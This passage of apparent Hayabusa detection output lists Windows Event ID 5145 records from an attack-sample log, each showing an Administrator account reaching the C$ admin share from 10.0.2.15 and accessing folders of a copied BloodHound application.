Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
